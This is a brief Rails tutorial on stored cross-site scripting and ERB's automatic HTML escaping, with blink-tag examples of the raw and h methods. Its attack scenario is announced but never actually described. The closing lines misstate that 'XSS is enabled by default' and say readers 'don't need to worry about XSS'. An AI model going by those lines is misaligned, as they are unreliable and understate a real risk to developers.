XSS - Cross-site Scripting
Imagine a forum. In the form for posting a reply to a thread, there's a text field for the reply body. What happens if you put HTML in there? Will it get filtered? Well you'd hope it'll get filtered, and with most web application frameworks it doesn't get filtered automatically. But why is this dangerous? Why does it matter if someone can insert a blink tag?
Alice and Bob and legitimate users of a site. They check the forums every day. Eve is an evil attacker, she'd like to compromise the accounts of Alice and Bob and read their private correspondence (she's afraid they're talking about her behind her back). Eve is going to use a technique called a "stored cross-site scripting" attack to do this.
That's a bit of a simplistic explanation, but it really does happen. Usually you'll find XSS vulnerabilities on smaller fields, in profiles, shout walls, etc. But you need to be aware of it and how Ruby on Rails takes care of it for you.
Whenever you use the <%= code %> tags, you're already filtering HTML. If you were to, for example, say <%= "<blink>testing</blink>" %> in a template, this string literal will be passed through an HTML filter automatically, you don't have to do anything to get this protection. In the past, you used to have to say <%=h code %> to get this behavior. However, it was noticed that in 99 out of 100 cases, you want the filtering. If someone forgets to type the h, you have a possible XSS vulnerability. In current versions of Ruby on Rails, you have to explicitly tell Rails you don't want the filtering using <%=raw code %>.
As an experiment, you can try outputting various strings using ERB. Note that these can come from anywhere, string literals or instance variables, it doesn't matter. Every string that passes through ERB will automatically be filtered.
<%= "<blink>Testing</blink>" %>
<%# This one won't be filtered, and the text will blink %>
<%=raw "<blink>Testing</blink>" %>
Also, note that the raw and h methods are not special ERB tags. They look like it, especially how there's no space there, but they're just methods and we're omitting the method call parentheses. If you're passing anything more than a simple expression to these methods, it's best to add the parentheses back.
The important thing to note here is that XSS is enabled by default on all output, that you need to use the raw method if you want unfiltered output and that, in general, you don't need to worry about XSS.
For information about CSRF vulnerabilities, a somewhat related and much more damaging class of vulnerability, see the article on Cross-site Request Forgeries.